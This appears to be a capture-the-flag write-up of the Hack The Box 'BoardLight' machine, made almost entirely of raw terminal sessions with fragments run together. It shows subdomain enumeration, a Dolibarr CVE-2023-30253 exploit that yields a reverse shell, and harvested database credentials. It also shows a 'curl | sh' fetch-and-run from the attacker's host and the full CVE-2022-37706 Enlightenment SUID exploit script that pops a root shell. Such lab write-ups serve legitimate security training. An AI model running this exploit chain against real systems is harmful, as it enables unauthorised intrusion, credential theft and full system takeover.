Hmm.. nothing
We do have email linked to board.htb, let's add it to hosts and try enumerate subdomains.
We are able to login with default credentials:
Last updated
┌──(woyag㉿kraken)-[~/Desktop/Rooms/BoardLight]
└─$ feroxbuster -u http://10.10.11.11/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -d 1 -x php
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.11.11/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/common.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 1
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 1l 3w 16c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 5l 23w 1217c http://10.10.11.11/images/location-white.png
200 GET 7l 48w 3995c http://10.10.11.11/images/d-5.png
200 GET 294l 633w 9209c http://10.10.11.11/do.php
200 GET 5l 48w 1493c http://10.10.11.11/images/fb.png
200 GET 280l 652w 9100c http://10.10.11.11/about.php
200 GET 517l 1053w 15949c http://10.10.11.11/
200 GET 294l 635w 9426c http://10.10.11.11/contact.php
301 GET 9l 28w 308c http://10.10.11.11/css => http://10.10.11.11/css/
301 GET 9l 28w 311c http://10.10.11.11/images => http://10.10.11.11/images/
301 GET 9l 28w 307c http://10.10.11.11/js => http://10.10.11.11/js/
[####################] - 22s 4761/4761 0s found:10 errors:2737
[####################] - 21s 4728/4728 223/s http://10.10.11.11/┌──(woyag㉿kraken)-[~/Desktop/Rooms/BoardLight]
└─$ domain="board.htb"; ffuf -u "http://$domain" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.$domain" -mc all -fl 518
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://board.htb
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.board.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response lines: 518
________________________________________________
crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 222ms]
:: Progress: [4989/4989] :: Job [1/1] :: 170 req/sec :: Duration: [0:00:29] :: Errors: 0 ::┌──(woyag㉿kraken)-[~/Desktop/Rooms/BoardLight]
└─$ py CVE-2023-30253.py
[+] Token: 2d11f087577b4e3739fa6229c4e6e38d
[+] Login Success!
[+] Website Created!
[+] Page Created!
[+] Payload Injected!
---
┌──(woyag㉿kraken)-[~/Desktop/Rooms/BoardLight]
└─$ pwncat -lp 4444
[17:37:15] Welcome to pwncat 🐈! __main__.py:164
[17:40:31] received connection from 10.10.11.11:36888 bind.py:84
[17:40:33] 10.10.11.11:36888: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@boardlight:/var/www/html/crm.board.htb/htdocs/website$(remote) www-data@boardlight:/var/www/html/crm.board.htb/htdocs/conf$ cat conf.php | grep -v '//'
<?php
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
$dolibarr_main_authentication='dolibarr';
$dolibarr_main_prod='0';
$dolibarr_main_force_https='0';
$dolibarr_main_restrict_os_commands='mysqldump, mysql, pg_dump, pgrestore';
$dolibarr_nocsrfcheck='0';
$dolibarr_main_instance_unique_id='ef9a8f59524328e3c36894a9ff0562b5';
$dolibarr_mailing_limit_sendbyweb='0';
$dolibarr_mailing_limit_sendbycli='0';
(remote) www-data@boardlight:/var/www/html/crm.board.htb/htdocs/conf$ ls /home
larissalarissa@boardlight:~$ cat user.txt
ac562f5e61623471ea40e49cbd04ba8blarissa@boardlight:/tmp/t$ curl 10.10.16.54/lp.sh | sh | tee lp.log
...
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-0847] DirtyPipe
Details: https://dirtypipe.cm4all.com/
Exposure: probable
Tags: [ ubuntu=(20.04|21.04) ],debian=11
Download URL: https://haxx.in/files/dirtypipez.c
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: mint=19,[ ubuntu=18|20 ], debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: probable
Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
...
larissa@boardlight:/tmp/t$ curl 10.10.16.54/exploit_nss.py -Os
larissa@boardlight:/tmp/t$ python3 exploit_nss.py
Traceback (most recent call last):
File "exploit_nss.py", line 220, in <module>
assert check_is_vuln(), "target is patched"
AssertionError: target is patchedlarissa@boardlight:/tmp$ find / -perm -4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapperlarissa@boardlight:/tmp$ echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
mount: /dev/../tmp/: cant find in /etc/fstab.
## whoami
root
## cd /root
## ls
root.txt snap
## cat root.txt
dcddc7a55c4749fbdb1e16b70660e295